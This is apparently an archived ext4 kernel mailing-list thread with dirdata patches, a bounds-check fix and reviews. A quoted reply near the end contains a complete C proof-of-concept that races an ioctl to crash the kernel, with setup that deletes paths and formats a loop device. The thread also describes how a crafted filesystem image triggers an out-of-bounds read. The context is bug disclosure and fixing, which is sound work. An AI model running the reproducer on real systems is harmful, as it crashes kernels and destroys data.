+ !t->det_reserved_zero2 &&
+ t->det_reserved_ft == EXT4_FT_DIR_CSUM;
+}
+
extern const struct iomap_ops ext4_iomap_ops;
extern const struct iomap_ops ext4_iomap_report_ops;
diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
index c2f330c75c81..2fc14332fab7 100644
--- a/fs/ext4/namei.c
+++ b/fs/ext4/namei.c
@@ -314,7 +314,6 @@ static struct ext4_dir_entry_tail *get_dirent_tail(struct inode *inode,
struct buffer_head *bh)
{
struct ext4_dir_entry_tail *t;
- int blocksize = EXT4_BLOCK_SIZE(inode->i_sb);
#ifdef PARANOID
struct ext4_dir_entry_2 *d, *top;
@@ -334,11 +333,7 @@ static struct ext4_dir_entry_tail *get_dirent_tail(struct inode *inode,
t = EXT4_DIRENT_TAIL(bh->b_data, EXT4_BLOCK_SIZE(inode->i_sb));
#endif
- if (t->det_reserved_zero1 ||
- (ext4_rec_len_from_disk(t->det_rec_len, blocksize) !=
- sizeof(struct ext4_dir_entry_tail)) ||
- t->det_reserved_zero2 ||
- t->det_reserved_ft != EXT4_FT_DIR_CSUM)
+ if (!ext4_dir_entry_is_tail((struct ext4_dir_entry_2 *)t))
return NULL;
return t;
--
2.43.7
^ permalink raw reply related
* [PATCH v4 02/11] ext4: replace ext4_dir_entry with ext4_dir_entry_2
From: Artem Blagodarenko @ 2026-06-24 13:36 UTC (permalink / raw)
To: linux-ext4; +Cc: adilger.kernel, Artem Blagodarenko, Andreas Dilger
In-Reply-To: <20260624133642.18438-1-ablagodarenko@thelustrecollective.com>
From: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Replace remaining uses of struct ext4_dir_entry in namei.c
with struct ext4_dir_entry_2.
The code paths affected by this change already depend on the
filetype feature, so using struct ext4_dir_entry_2 is
appropriate and avoids mixing the two directory entry types
unnecessarily.
This change does not affect support for 16-bit rec_len.
Signed-off-by: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
---
fs/ext4/namei.c | 38 +++++++++++++++++++-------------------
1 file changed, 19 insertions(+), 19 deletions(-)
diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
index a283e285937a..c2f330c75c81 100644
--- a/fs/ext4/namei.c
+++ b/fs/ext4/namei.c
@@ -102,7 +102,7 @@ static struct buffer_head *ext4_append(handle_t *handle,
}
static int ext4_dx_csum_verify(struct inode *inode,
- struct ext4_dir_entry *dirent);
+ struct ext4_dir_entry_2 *dirent);
/*
* Hints to ext4_read_dirblock regarding whether we expect a directory
@@ -128,7 +128,7 @@ static struct buffer_head *__ext4_read_dirblock(struct inode *inode,
unsigned int line)
{
struct buffer_head *bh;
- struct ext4_dir_entry *dirent;
+ struct ext4_dir_entry_2 *dirent;
int is_dx_block = 0;
if (block >= inode->i_size >> inode->i_blkbits) {
@@ -160,7 +160,7 @@ static struct buffer_head *__ext4_read_dirblock(struct inode *inode,
}
if (!bh)
return NULL;
- dirent = (struct ext4_dir_entry *) bh->b_data;
+ dirent = (struct ext4_dir_entry_2 *) bh->b_data;
/* Determine whether or not we have an index block */
if (is_dx(inode)) {
if (block == 0)
@@ -317,13 +317,13 @@ static struct ext4_dir_entry_tail *get_dirent_tail(struct inode *inode,
int blocksize = EXT4_BLOCK_SIZE(inode->i_sb);
#ifdef PARANOID
- struct ext4_dir_entry *d, *top;
+ struct ext4_dir_entry_2 *d, *top;
- d = (struct ext4_dir_entry *)bh->b_data;
- top = (struct ext4_dir_entry *)(bh->b_data +
+ d = (struct ext4_dir_entry_2 *)bh->b_data;
+ top = (struct ext4_dir_entry_2 *)(bh->b_data +
(blocksize - sizeof(struct ext4_dir_entry_tail)));
while (d < top && ext4_rec_len_from_disk(d->rec_len, blocksize))
- d = (struct ext4_dir_entry *)(((void *)d) +
+ d = (struct ext4_dir_entry_2 *)(((void *)d) +
ext4_rec_len_from_disk(d->rec_len, blocksize));
if (d != top)
@@ -410,22 +410,22 @@ int ext4_handle_dirty_dirblock(handle_t *handle,
}
static struct dx_countlimit *get_dx_countlimit(struct inode *inode,
- struct ext4_dir_entry *dirent,
+ struct ext4_dir_entry_2 *dirent,
int *offset)
{
- struct ext4_dir_entry *dp;
+ struct ext4_dir_entry_2 *de;
struct dx_root_info *root;
int count_offset;
int blocksize = EXT4_BLOCK_SIZE(inode->i_sb);
unsigned int rlen = ext4_rec_len_from_disk(dirent->rec_len, blocksize);
if (rlen == blocksize)
- count_offset = 8;
+ count_offset = sizeof(struct dx_node);
else if (rlen == 12) {
- dp = (struct ext4_dir_entry *)(((void *)dirent) + 12);
- if (ext4_rec_len_from_disk(dp->rec_len, blocksize) != blocksize - 12)
+ de = (struct ext4_dir_entry_2 *)(((void *)dirent) + 12);
+ if (ext4_rec_len_from_disk(de->rec_len, blocksize) != blocksize - 12)
return NULL;
- root = (struct dx_root_info *)(((void *)dp + 12));
+ root = (struct dx_root_info *)(((void *)de + 12));
if (root->reserved_zero ||
root->info_length != sizeof(struct dx_root_info))
return NULL;
@@ -438,7 +438,7 @@ static struct dx_countlimit *get_dx_countlimit(struct inode *inode,
return (struct dx_countlimit *)(((void *)dirent) + count_offset);
}
-static __le32 ext4_dx_csum(struct inode *inode, struct ext4_dir_entry *dirent,
+static __le32 ext4_dx_csum(struct inode *inode, struct ext4_dir_entry_2 *dirent,
int count_offset, int count, struct dx_tail *t)
{
struct ext4_inode_info *ei = EXT4_I(inode);
@@ -456,7 +456,7 @@ static __le32 ext4_dx_csum(struct inode *inode, struct ext4_dir_entry *dirent,
}
static int ext4_dx_csum_verify(struct inode *inode,
- struct ext4_dir_entry *dirent)
+ struct ext4_dir_entry_2 *dirent)
{
struct dx_countlimit *c;
struct dx_tail *t;
@@ -489,7 +489,7 @@ static int ext4_dx_csum_verify(struct inode *inode,
return 1;
}
-static void ext4_dx_csum_set(struct inode *inode, struct ext4_dir_entry *dirent)
+static void ext4_dx_csum_set(struct inode *inode, struct ext4_dir_entry_2 *dirent)
{
struct dx_countlimit *c;
struct dx_tail *t;
@@ -523,7 +523,7 @@ static inline int ext4_handle_dirty_dx_node(handle_t *handle,
struct inode *inode,
struct buffer_head *bh)
{
- ext4_dx_csum_set(inode, (struct ext4_dir_entry *)bh->b_data);
+ ext4_dx_csum_set(inode, (struct ext4_dir_entry_2 *)bh->b_data);
return ext4_handle_dirty_metadata(handle, inode, bh);
}
@@ -1496,7 +1496,7 @@ int ext4_search_dir(struct buffer_head *bh, char *search_buf, int buf_size,
}
static int is_dx_internal_node(struct inode *dir, ext4_lblk_t block,
- struct ext4_dir_entry *de)
+ struct ext4_dir_entry_2 *de)
{
struct super_block *sb = dir->i_sb;
@@ -1627,7 +1627,7 @@ static struct buffer_head *__ext4_find_entry(struct inode *dir,
}
if (!buffer_verified(bh) &&
!is_dx_internal_node(dir, block,
- (struct ext4_dir_entry *)bh->b_data) &&
+ (struct ext4_dir_entry_2 *)bh->b_data) &&
!ext4_dirblock_csum_verify(dir, bh)) {
EXT4_ERROR_INODE_ERR(dir, EFSBADCRC,
"checksumming directory "
--
2.43.7
^ permalink raw reply related
* [PATCH v4 01/11] ext4: validate count against limit in ext4_dx_csum_verify/_set
From: Artem Blagodarenko @ 2026-06-24 13:36 UTC (permalink / raw)
To: linux-ext4
Cc: adilger.kernel, Artem Blagodarenko, xiaowu.417,
Artem Blagodarenko
In-Reply-To: <20260624133642.18438-1-ablagodarenko@thelustrecollective.com>
dx_countlimit's count field was read from disk and used directly to
compute the checksummed range (count_offset + count * sizeof(dx_entry))
without ever being checked against limit -- only limit itself was
bounds-checked against the block size. A corrupted or maliciously
crafted filesystem image that sets count to a large value (e.g. 65535)
makes ext4_chksum() read far past the end of the directory block
buffer, hitting adjacent slab objects.
Reported-by: xiaowu.417@qq.com
Signed-off-by: Artem Blagodarenko <artem.blagodarenko@gmail.com>
---
fs/ext4/namei.c | 8 ++++++++
1 file changed, 8 insertions(+)
diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
index cc49ae04a6f6..a283e285937a 100644
--- a/fs/ext4/namei.c
+++ b/fs/ext4/namei.c
@@ -477,6 +477,10 @@ static int ext4_dx_csum_verify(struct inode *inode,
warn_no_space_for_csum(inode);
return 0;
}
+ if (count > limit) {
+ EXT4_ERROR_INODE(inode, "dir seems corrupt? Run e2fsck -D.");
+ return 0;
+ }
t = (struct dx_tail *)(((struct dx_entry *)c) + limit);
if (t->dt_checksum != ext4_dx_csum(inode, dirent, count_offset,
@@ -506,6 +510,10 @@ static void ext4_dx_csum_set(struct inode *inode, struct ext4_dir_entry *dirent)
warn_no_space_for_csum(inode);
return;
}
+ if (count > limit) {
+ EXT4_ERROR_INODE(inode, "dir seems corrupt? Run e2fsck -D.");
+ return;
+ }
t = (struct dx_tail *)(((struct dx_entry *)c) + limit);
t->dt_checksum = ext4_dx_csum(inode, dirent, count_offset, count, t);
--
2.43.7
^ permalink raw reply related
* [PATCH v4 00/11] Data in direntry (dirdata) feature
From: Artem Blagodarenko @ 2026-06-24 13:36 UTC (permalink / raw)
To: linux-ext4; +Cc: adilger.kernel, Artem Blagodarenko
EXT4 currently stores a hash in the directory entry
(dirent) immediately after the file name to support
simultaneous fscrypt and casefold functionality.
It has been discussed within the EXT4 community that
this hash could instead be stored in dirdata. This
would make it the second (or third, in the case of
64-bit inode counts) user of dirdata.
At the same time, the existing format—where the hash
is placed after the file name—must continue to be
supported. With these patches, EXT4 can handle the
hash in both formats.
The first user of this feature is LUFID -
Locally Unique File ID.
Support for fscrypt and case-insensitive directories
with dirdata enabled has been verified using a
dedicated xfstest submitted to the xfstests list as
a separate patch.
e2fsprogs support is provided in a separate patches
series.
Changes in v4:
- syzbot ci actually ran the v3 series and found real,
reproducible KASAN slab-out-of-bounds and use-after-free
reads, all rooted in ext4_dir_entry_len() decoding
de->rec_len with a hardcoded full-block size even when
the entry lives in a smaller buffer (inline directory
data). Gave it an explicit blocksize parameter and fixed
every caller to pass the real containing-buffer size.
- dx_get_dx_info() and get_dx_countlimit() additionally
needed dir=NULL (not just the right blocksize) when
computing past the on-disk '.'/'..' entries, since those
never carry the casefold+fscrypt hash regardless of the
directory's feature flags; passing the real dir made
ext4_dirent_rec_len() add 8 bytes of hash space that was
never written on disk, corrupting dx_root_info's offset
for every casefold+encrypt directory.
- ext4_dirdata_get()/ext4_dirdata_set(): fixed bounds checks
that were off by EXT4_BASE_DIR_LEN (the 8-byte dirent
header), a LUFID memcpy that used the wrong source/length,
an out-of-bounds array write for maximum-length filenames,
and an uninitialized gap byte leaking a stale memory byte
to disk.
- EXT4_IOC_SET_LUFID: fixed ddh_length under-counting the
header byte (silently dropping the last byte of every
LUFID payload), rejected '.'/'..' as targets, added a
missing inode_permission(dir, MAY_WRITE) check, and closed
a data race on the shared i_dirdata field by also locking
the target inode (not just the parent directory) for the
duration it's used.
- Fixed a missing bounds check in ext4_dx_csum_verify()/
ext4_dx_csum_set() that let an unvalidated on-disk `count`
field drive an out-of-bounds checksum read. This bug
predates this series, but is included as patch 1 (ahead
of the patch that touches this function) since it was
found via review of this series.
- Thanks to Sashiko AI review and to Xiao (xiaowu.417@qq.com)
for reproducing several of the above with concrete crash
logs and PoCs.
Artem Blagodarenko (11):
ext4: validate count against limit in ext4_dx_csum_verify/_set
ext4: replace ext4_dir_entry with ext4_dir_entry_2
ext4: add ext4_dir_entry_is_tail()
ext4: refactor dx_root to support variable dirent sizes
ext4: add dirdata format definitions and access helpers
ext4: preserve dirdata bits in get_dtype()
ext4: add ext4_dir_entry_len() and harden dirdata parsing
ext4: rename ext4_dir_rec_len() and clarify dirdata usage
ext4: dirdata feature
ext4: add dirdata set/get helpers
ext4: Add EXT4_IOC_SET_LUFID ioctl for setting LUFID on directory
entries
foofile.txt | 0
fs/ext4/dir.c | 9 +-
fs/ext4/ext4.h | 211 +++++++++++-
fs/ext4/inline.c | 41 ++-
fs/ext4/ioctl.c | 84 +++++
fs/ext4/namei.c | 699 +++++++++++++++++++++++++++++---------
fs/ext4/sysfs.c | 2 +
include/uapi/linux/ext4.h | 13 +
8 files changed, 861 insertions(+), 198 deletions(-)
create mode 100644 foofile.txt
--
2.43.7
^ permalink raw reply
* Re: [PATCH] ext4: cancel dirty accounting for folios without buffers
From: Zhang Yi @ 2026-06-24 13:29 UTC (permalink / raw)
To: Jan Kara, Zhu Jia
Cc: Zhang Yi, tytso, adilger.kernel, libaokun, ojaswin, ritesh.list,
linux-ext4, linux-kernel, stable
In-Reply-To: <x3jm3mhgsr7zx4hvfgdvmwoqyz5vxx2fjyxy6gs6him46767f6@dkkirnw54x6x>
On 6/24/2026 8:32 PM, Jan Kara wrote:
> On Wed 24-06-26 17:52:06, Zhu Jia wrote:
>> Hi Yi,
>>
>> Thanks for taking a look.
>>
>> Yes, clearing PAGECACHE_TAG_DIRTY/TOWRITE would make the page-cache state
>> cleaner. I had a version that did this by adding a helper around
>> folio_cancel_dirty() and clearing the xarray tags after confirming the
>> folio was still the same clean page-cache entry.
>>
>> It looked like this:
>>
>> static void ext4_cancel_dirty_folio(struct address_space *mapping,
>> struct folio *folio)
>> {
>> XA_STATE(xas, &mapping->i_pages, folio->index);
>> unsigned long flags;
>>
>> folio_cancel_dirty(folio);
>>
>> xas_lock_irqsave(&xas, flags);
>> if (xas_load(&xas) == folio && !folio_test_dirty(folio)) {
>> xas_clear_mark(&xas, PAGECACHE_TAG_DIRTY);
>> xas_clear_mark(&xas, PAGECACHE_TAG_TOWRITE);
>> }
>> xas_unlock_irqrestore(&xas, flags);
>> }
>>
>> The reason I left the tags unchanged in this version is that I was not sure
>> whether it is appropriate for ext4 to open-code xarray tag cleanup directly.
>>
>> If you think this is the right direction, I can add the helper back and
>> send a v2.
>
> That was a good judgement! Playing with xarray tags like this in filesystem
> code is certainly not a good thing. For now, I'd leave the xarray tags
> dangling - they will be eventually synced with reality on next writeback
> attempt. If this inconsistency of tags needs to be fixed, the fix belongs
> to the generic code (so that it can be used in other places as well).
>
> Honza
Yes, I agree. Directly clearing the tag via open code is not a good
approach. However, I took a look at the !nr_to_submit branch in
ext4_bio_write_folio(), and it seems to have a similar simple handling
pattern—it directly calls __folio_start_writeback() and
folio_end_writeback(), which appears to be an elegant way to clear them.
Could we also call these two helpers just after folio_cancel_dirty()
here?
Thanks,
Yi.
^ permalink raw reply
* Re: [PATCH v2] ext4: fix ABBA deadlock in ext4_xattr_inode_cache_find()
From: Jan Kara @ 2026-06-24 13:13 UTC (permalink / raw)
To: Aditya Srivastava
Cc: tytso, jack, adilger.kernel, libaokun, ritesh.list, yi.zhang,
linux-ext4, linux-kernel, Colin Ian King
In-Reply-To: <20260623095911.2372-1-aditya.ansh182@gmail.com>
On Tue 23-06-26 09:59:11, Aditya Srivastava wrote:
> From: Aditya Prakash Srivastava <aditya.ansh182@gmail.com>
>
> Syzbot/stress-ng reported an ABBA deadlock in ext4 when exercising
> concurrent xattr workloads (using the ea_inode mount/format option).
>
> The deadlock occurs between the running transaction and the eviction
> thread:
> - Task 1 (stress-ng): Holds a reference to a shared mbcache_entry (ce)
> and calls ext4_xattr_inode_cache_find() -> ext4_iget() to retrieve
> the corresponding EA inode. Since the EA inode is currently being
> evicted, ext4_iget() blocks in __wait_on_freeing_inode() waiting for
> eviction to complete.
> - Task 2 (eviction thread): Currently evicting the same EA inode in
> ext4_evict_ea_inode(). It calls mb_cache_entry_wait_unused(oe) which
> blocks waiting for Task 1 to release the reference to the mbcache_entry.
>
> To break this deadlock, perform a non-blocking lookup of the EA inode
> using VFS's find_inode_nowait() API. If the EA inode is currently being
> evicted (marked with I_FREEING or I_WILL_FREE), simply skip it (treat
> as a cache miss) rather than waiting for eviction to complete. If the
> returned inode is found to be I_NEW, wait for its initialization to
> clear using wait_on_new_inode().
>
> This deadlock was made much easier to hit after commit 0a46ef234756
> ("ext4: do not create EA inode under buffer lock") which removed
> synchronization on the buffer lock.
>
> Reported-by: Colin Ian King <colin.i.king@gmail.com>
> Closes: https://bugzilla.kernel.org/show_bug.cgi?id=219283
> Fixes: 0a46ef234756 ("ext4: do not create EA inode under buffer lock")
> Signed-off-by: Aditya Prakash Srivastava <aditya.ansh182@gmail.com>
I was looking into this for quite some time in the past and then run out of
time when redesigning locking of the xattrs (which is a mess). Your
solution is a bit hacky but as a quick stability fix before we can rework
xattr locking it actually looks as a neat idea!
> diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
> index 982a1f831e22..ef13e7a76153 100644
> --- a/fs/ext4/xattr.c
> +++ b/fs/ext4/xattr.c
> @@ -1523,6 +1523,20 @@ static struct inode *ext4_xattr_inode_create(handle_t *handle,
> return ea_inode;
> }
>
> +static int ext4_xattr_inode_match(struct inode *inode, u64 ino, void *data)
> +{
> + if (inode->i_ino != ino)
> + return 0;
> + spin_lock(&inode->i_lock);
> + if (inode_state_read(inode) & (I_FREEING | I_WILL_FREE)) {
> + spin_unlock(&inode->i_lock);
> + return 0;
> + }
I think you should also skip I_CREATING inodes here... I don't think you
can really spot them here but just that we don't have to worry.
> + __iget(inode);
> + spin_unlock(&inode->i_lock);
> + return 1;
> +}
> +
> static struct inode *
> ext4_xattr_inode_cache_find(struct inode *inode, const void *value,
> size_t value_len, u32 hash)
> @@ -1549,10 +1563,19 @@ ext4_xattr_inode_cache_find(struct inode *inode, const void *value,
> }
>
> while (ce) {
> - ea_inode = ext4_iget(inode->i_sb, ce->e_value,
> - EXT4_IGET_EA_INODE);
> - if (IS_ERR(ea_inode))
> + ea_inode = find_inode_nowait(inode->i_sb, ce->e_value,
> + ext4_xattr_inode_match, NULL);
> + if (!ea_inode)
> goto next_entry;
> + if (inode_state_read_once(ea_inode) & I_NEW)
> + wait_on_new_inode(ea_inode);
> + if (is_bad_inode(ea_inode) ||
> + !(EXT4_I(ea_inode)->i_flags & EXT4_EA_INODE_FL) ||
> + ext4_test_inode_state(ea_inode, EXT4_STATE_XATTR) ||
> + EXT4_I(ea_inode)->i_file_acl) {
> + iput(ea_inode);
> + goto next_entry;
> + }
So instead of opencoding these checks here, I'd rather implement
EXT4_IGET_NOWAIT flag which will use find_inode_nowait() like above for the
inode lookup and then you don't have to opencode the sanity checks here and
they can stay contained in ext4_iget() code...
Honza
--
Jan Kara <jack@suse.com>
SUSE Labs, CR
^ permalink raw reply
* Re: [PATCH] ext4: cancel dirty accounting for folios without buffers
From: Zhu Jia @ 2026-06-24 13:10 UTC (permalink / raw)
To: Jan Kara
Cc: Zhu Jia, Zhang Yi, Theodore Ts'o, Andreas Dilger, Baokun Li,
Ojaswin Mujoo, Ritesh Harjani, linux-ext4, linux-kernel, stable
In-Reply-To: <x3jm3mhgsr7zx4hvfgdvmwoqyz5vxx2fjyxy6gs6him46767f6@dkkirnw54x6x>
On Wed, Jun 24, 2026 at 02:32:27PM +0200, Jan Kara wrote:
> On Wed 24-06-26 17:52:06, Zhu Jia wrote:
> > The reason I left the tags unchanged in this version is that I was not sure
> > whether it is appropriate for ext4 to open-code xarray tag cleanup directly.
> >
> > If you think this is the right direction, I can add the helper back and
> > send a v2.
>
> That was a good judgement! Playing with xarray tags like this in filesystem
> code is certainly not a good thing. For now, I'd leave the xarray tags
> dangling - they will be eventually synced with reality on next writeback
> attempt. If this inconsistency of tags needs to be fixed, the fix belongs
> to the generic code (so that it can be used in other places as well).
>
> Honza
Thanks, makes sense. I'll keep the fix as-is and leave the xarray tags
alone.
Thanks,
Jia
^ permalink raw reply
* Re: [PATCH v3 10/10] ext4: Add EXT4_IOC_SET_LUFID ioctl for setting LUFID on directory entries
From: Artem Blagodarenko @ 2026-06-24 12:33 UTC (permalink / raw)
To: XIAO WU; +Cc: linux-ext4, adilger.kernel, Andreas Dilger
In-Reply-To: <tencent_2D1051E0281A7550C4CA60798593BF905B09@qq.com>
Hi Xiao,
Thanks for the detailed reproducer and analysis of the race condition on
EXT4_I(inode)->i_dirdata, and for the additional issues you flagged from
the same Sashiko AI review. I've confirmed all of them by reading the
code directly and fixed each one:
- ddh_length was missing the header's own length (only esl_data_len was
used), which silently dropped the last byte of every LUFID payload set
through this ioctl. Fixed to include the header size, and tightened the
esl_data_len upper bound so the result can't wrap the __u8 field.
- '.' and '..' are now rejected -- they must stay the fixed first two
entries of the directory's first block, and can't go through this
ioctl's general delete+re-add path.
- The handler now checks inode_permission(dir, MAY_WRITE) before
proceeding, instead of relying only on mnt_want_write_file().
- ext4_dirdata_set_lufid() now also locks the target inode (nested under
the parent directory, consistently dir-then-inode) for the
i_dirdata set/use/restore window, closing the race you reproduced
between concurrent calls on different hardlinks of the same inode.
All four fixes will be included in the next version of this series.
Thanks again for the thorough reproducers -- they were a big help in
pinning down the root causes.
Artem
On Mon, 22 Jun 2026 at 18:21, XIAO WU <xiaowu.417@qq.com> wrote:
>
> Hi Artem,
>
> I came across the Sashiko AI review [1] of this patch and was able to
> reproduce a kernel crash triggered by a race condition in
> ext4_dirdata_set_lufid(). I wanted to share the evidence in case it's
> helpful.
>
> The core issue is that EXT4_I(inode)->i_dirdata is set to a
> stack-local pointer without locking the target inode:
>
> > +static int ext4_dirdata_set_lufid(struct inode *dir,
> > + const char *name, int namelen,
> > + struct ext4_dentry_param *edp)
> > +{
> > ...
> > + EXT4_I(inode)->i_dirdata = edp;
>
> The function locks the parent directory (inode_lock(dir)), but does NOT
> lock the target inode. If two threads operate on different hardlinks
> to the *same* inode (in different directories), they race to overwrite
> inode->i_dirdata with each other's stack-local edp pointers. The
> winner's stack pointer is later consumed through ext4_add_entry() →
> ext4_lookup() → ext4_dentry_get_fid(), reading from a stale or
> overwritten stack frame.
>
> With KASAN enabled this manifests as a null-ptr-deref because KASAN
> poisons freed stack memory.
>
> [Reproduction]
>
> The PoC creates two subdirectories (/mnt/test/da and /mnt/test/db),
> hardlinks the same file into both, then runs 8 child processes that
> hammer EXT4_IOC_SET_LUFID on the two directories simultaneously via
> ioctl(). Each child is pinned to a specific CPU to maximize the race
> window. The kernel panics within a few seconds.
>
> [Crash log — kernel 7.1.0-next-20260618, CONFIG_KASAN=y, SMP]
>
> Oops: general protection fault, probably for non-canonical address
> 0xdffffc0000000000: 0000 [#1] SMP KASAN NOPTI
> KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]
>
> RIP: 0010:ext4_dirdata_set_lufid+0x3e8/0xb00
> RAX: dffffc0000000000 RBX: 0000000000000000
> ...
> Call Trace:
> <TASK>
> ext4_ioctl_set_lufid+0x2d9/0x350
> __ext4_ioctl+0x1d2/0x43c0
> __x64_sys_ioctl+0x193/0x210
> do_syscall_64+0x129/0x850
> entry_SYSCALL_64_after_hwframe+0x77/0x7f
> </TASK>
>
> The same crash was independently hit by a second thread at [#2],
> confirming the race condition.
>
> Additionally, the Sashiko review [1] noted a few other issues in this
> patch that may be worth checking:
>
> - The ioctl does not reject '.' and '..' — modifying these special
> entries via EXT4_IOC_SET_LUFID would corrupt the directory layout.
>
> - The ddh_length computation in ext4_find_dest_de() appears to
> exclude the header size (1 byte), which can cause the header and
> data insertion to overflow by one byte into the adjacent directory
> entry when (fname_len + esl_data_len) % 4 == 0.
>
> - The handler calls mnt_want_write_file() but omits an explicit
> inode_permission(dir, MAY_WRITE) check, which may allow an
> unprivileged user with read-only access to the directory to
> modify directory entries.
>
> The PoC is attached below. It compiles with:
>
> gcc -o poc poc.c -static
>
> [1]
> https://sashiko.dev/#/patchset/20260619191022.27008-1-ablagodarenko%40thelustrecollective.com
> (Sashiko AI code review — "Dangling Pointer", Severity: Critical)
>
> Thanks,
> XIAO
>
> // PoC: race on EXT4_I(inode)->i_dirdata via EXT4_IOC_SET_LUFID
> #define _GNU_SOURCE
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
> #include <stdint.h>
> #include <sys/types.h>
> #include <sys/stat.h>
> #include <sys/ioctl.h>
> #include <sys/mount.h>
> #include <sys/wait.h>
> #include <fcntl.h>
> #include <errno.h>
> #include <sched.h>
> #include <linux/loop.h>
> #include <linux/fs.h>
>
> struct ext4_set_lufid {
> uint8_t esl_name_len;
> char esl_name[256];
> uint8_t esl_data_len;
> char esl_data[255];
> };
> #define EXT4_IOC_SET_LUFID _IOW('f', 47, struct ext4_set_lufid)
> #define MNT "/mnt/test"
>
> int main(void)
> {
> int fd, ret;
>
> setvbuf(stdout, NULL, _IONBF, 0);
> printf("=== EXT4_IOC_SET_LUFID PoC ===\n\n");
>
> /* Setup loopback ext4 filesystem */
> system("umount -l /mnt/test 2>/dev/null; losetup -d /dev/loop0
> 2>/dev/null; true");
> system("rm -rf /mnt/test /tmp/img 2>/dev/null");
> mkdir(MNT, 0755);
> system("dd if=/dev/zero of=/tmp/img bs=1M count=64 2>/dev/null");
> system("losetup /dev/loop0 /tmp/img 2>/dev/null");
> system("mkfs.ext4 -F -b 1024 -O ^metadata_csum,^64bit,^flex_bg
> /dev/loop0 2>/dev/null");
> if (mount("/dev/loop0", MNT, "ext4", 0, NULL) != 0) {
> printf("Mount failed\n"); return 1;
> }
>
> /* Create target file with two hardlinks in different directories */
> mkdir(MNT "/da", 0755);
> mkdir(MNT "/db", 0755);
> close(open(MNT "/t", O_CREAT|O_WRONLY, 0644));
> link(MNT "/t", MNT "/da/t");
> link(MNT "/t", MNT "/db/t");
>
> printf("Racing EXT4_IOC_SET_LUFID on hardlinks...\n");
> for (int r = 0; r < 20; r++) {
> pid_t kids[8];
> for (int i = 0; i < 8; i++) {
> kids[i] = fork();
> if (kids[i] == 0) {
> /* Half target /da, half target /db — same inode */
> const char *dir = (i < 4) ? MNT "/da" : MNT "/db";
> cpu_set_t cpuset;
> CPU_ZERO(&cpuset);
> CPU_SET(i % 2, &cpuset);
> sched_setaffinity(0, sizeof(cpu_set_t), &cpuset);
>
> for (int j = 0; j < 5000; j++) {
> struct ext4_set_lufid l = {0};
> l.esl_name_len = 2;
> memcpy(l.esl_name, "t\0", 2);
> l.esl_data_len = 5;
> memcpy(l.esl_data, "ABCDE", 5);
> int f = open(dir, O_RDONLY);
> if (f >= 0) {
> ioctl(f, EXT4_IOC_SET_LUFID, &l);
> close(f);
> }
> }
> _exit(0);
> }
> }
> for (int i = 0; i < 8; i++) {
> int ws;
> waitpid(kids[i], &ws, 0);
> }
> printf("."); fflush(stdout);
> }
> printf("\n");
>
> printf("\n=== dmesg ===\n"); fflush(stdout);
> system("dmesg | grep -iE 'KASAN|BUG:|Call Trace|general protection'
> | tail -40");
>
> umount(MNT);
> system("losetup -d /dev/loop0 2>/dev/null");
> printf("Done.\n");
> return 0;
> }
>
^ permalink raw reply
* Re: [PATCH] ext4: cancel dirty accounting for folios without buffers
From: Jan Kara @ 2026-06-24 12:32 UTC (permalink / raw)
To: Zhu Jia
Cc: tytso, adilger.kernel, libaokun, jack, ojaswin, ritesh.list,
yi.zhang, linux-ext4, linux-kernel, stable
In-Reply-To: <20260623094947.7853-1-zhujia.zj@bytedance.com>
On Tue 23-06-26 17:49:47, Zhu Jia wrote:
> Since commit cc5095747edf ("ext4: don't BUG if someone dirty pages
> without asking ext4 first"), mpage_prepare_extent_to_map() handles dirty
> folios without buffer heads by warning, clearing PG_dirty, and skipping
> them. ext4 cannot write these folios because there are no buffer heads to
> map and submit.
>
> That recovery leaves dirty accounting behind: folio_clear_dirty() clears
> PG_dirty but does not undo the accounting charged when the folio was
> dirtied. We have seen this in production as Dirty/nr_dirty staying high
> while Writeback/nr_writeback and device write IO stayed near zero, with
> many writer tasks blocked in balance_dirty_pages() throttling. Thus the
> warning-and-skip recovery can still become a dirty-throttle DoS.
>
> Use folio_cancel_dirty() so dropping PG_dirty also cancels the dirty
> accounting.
>
> Fixes: cc5095747edf ("ext4: don't BUG if someone dirty pages without asking ext4 first")
> Cc: stable@vger.kernel.org
> Signed-off-by: Zhu Jia <zhujia.zj@bytedance.com>
Good point. Feel free to add:
Reviewed-by: Jan Kara <jack@suse.cz>
Honza
> ---
> fs/ext4/inode.c | 8 +++++++-
> 1 file changed, 7 insertions(+), 1 deletion(-)
>
> diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
> index c2c2d6ac7f3d1..7ea280e70c06e 100644
> --- a/fs/ext4/inode.c
> +++ b/fs/ext4/inode.c
> @@ -2715,7 +2715,13 @@ static int mpage_prepare_extent_to_map(struct mpage_da_data *mpd)
> */
> if (!folio_buffers(folio)) {
> ext4_warning_inode(mpd->inode, "page %lu does not have buffers attached", folio->index);
> - folio_clear_dirty(folio);
> + /*
> + * folio_cancel_dirty() pairs the dropped dirty
> + * state with dirty accounting, but leaves stale
> + * PAGECACHE_TAG_DIRTY/TOWRITE tags behind. Later
> + * writeback may rescan this clean folio.
> + */
> + folio_cancel_dirty(folio);
> folio_unlock(folio);
> continue;
> }
> --
> 2.20.1
--
Jan Kara <jack@suse.com>
SUSE Labs, CR
^ permalink raw reply
* Re: [PATCH v3 01/10] ext4: replace ext4_dir_entry with ext4_dir_entry_2
From: Artem Blagodarenko @ 2026-06-24 12:32 UTC (permalink / raw)
To: XIAO WU; +Cc: linux-ext4, adilger.kernel, Andreas Dilger
In-Reply-To: <tencent_23A0889489F22224F3214F20C2C091373E0A@qq.com>
Hi Xiao,
Thanks for taking the time to verify the Sashiko AI finding and provide a
concrete reproducer and crash log for the missing count-vs-limit check in
ext4_dx_csum_verify()/ext4_dx_csum_set(). You're right that this is a real
bug, independent of this series (it's unmodified upstream logic that this
patch only renamed a parameter type on).
I've added a fix that validates count against limit before it's used to
compute the checksummed range, returning the same "corrupt, run e2fsck"
error path as the existing limit check. It will be included as the first
patch of the next version of this series, ahead of the patch that touches
this function, so the issue is fixed before it would otherwise be flagged
again.
Thanks again for the thorough analysis.
Artem
On Mon, 22 Jun 2026 at 18:29, XIAO WU <xiaowu.417@qq.com> wrote:
>
> Hi Artem,
